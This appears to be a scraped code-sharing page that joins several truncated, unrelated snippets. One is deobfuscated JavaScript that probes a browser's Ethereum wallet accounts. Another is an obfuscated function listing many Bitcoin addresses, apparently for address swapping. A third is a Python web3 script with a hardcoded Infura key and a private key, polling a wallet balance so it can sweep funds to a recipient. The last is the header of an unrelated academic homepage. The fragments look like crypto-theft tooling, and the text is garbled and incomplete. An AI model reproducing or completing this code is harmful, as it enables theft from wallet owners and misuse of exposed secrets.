This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Deobfusicated with https://obf-io.deobfuscate.io | |
| var neth = 0; | |
| var rund = 0; | |
| var loval = 0; | |
| async function checkethereumw() { | |
| try { | |
| const _0x124ed3 = await window.ethereum.request({ | |
| 'method': "eth_accounts" | |
| }); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function _0x20669a(_0x530d91) { | |
| var _0x264994 = [ | |
| '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', | |
| '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', | |
| '1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP', | |
| '1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY', | |
| '1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj', | |
| '1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N', | |
| '1KkovSeka94yC5K4fDbfbvZeTFoorPggKW', | |
| '18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import threading | |
| from web3 import Web3 | |
| w3 = Web3(Web3.HTTPProvider("https://mainnet.infura.io/v3/2571f67ab76b4397977b05ffa189d0e5")) | |
| private_key = "ee9cec01ff03c0adea731d7c5a84f7b412bfd062b9ff35126520b3eb3d5ff258" | |
| pub_key ="0x4DE23f3f0Fb3318287378AdbdE030cf61714b2f3" | |
| recipient_pub_key = "0x43C306665A5713f0067206D18409E919756A1da6" | |
| def loop(): | |
| while True: | |
| balance = w3.eth.get_balance(pub_key) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" | |
| "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> | |
| <head> | |
| <meta name="generator" content="jemdoc, see http://jemdoc.jaboc.net/" /> | |
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> | |
| <link rel="stylesheet" href="jemdoc.css" type="text/css" /> | |
| <title>Nguyen H. Tran | |
| </title> |